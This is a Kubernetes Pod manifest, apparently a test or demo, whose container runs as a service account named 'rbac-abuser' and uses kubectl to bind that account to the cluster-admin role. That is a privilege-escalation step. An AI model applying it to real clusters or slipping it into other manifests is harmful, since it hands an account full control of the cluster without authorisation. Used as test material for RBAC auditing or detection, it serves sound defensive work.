apiVersion: v1
kind: Pod
metadata:
  name: clusterrole-test
spec:
  serviceAccountName: rbac-abuser
  containers:
  - name: demo
    image: bitnami/kubectl:latest
    command:
    - /bin/sh
    - -c
    - |
      kubectl create clusterrolebinding fake-binding --clusterrole=cluster-admin --serviceaccount=default:rbac-abuser
  restartPolicy: Never
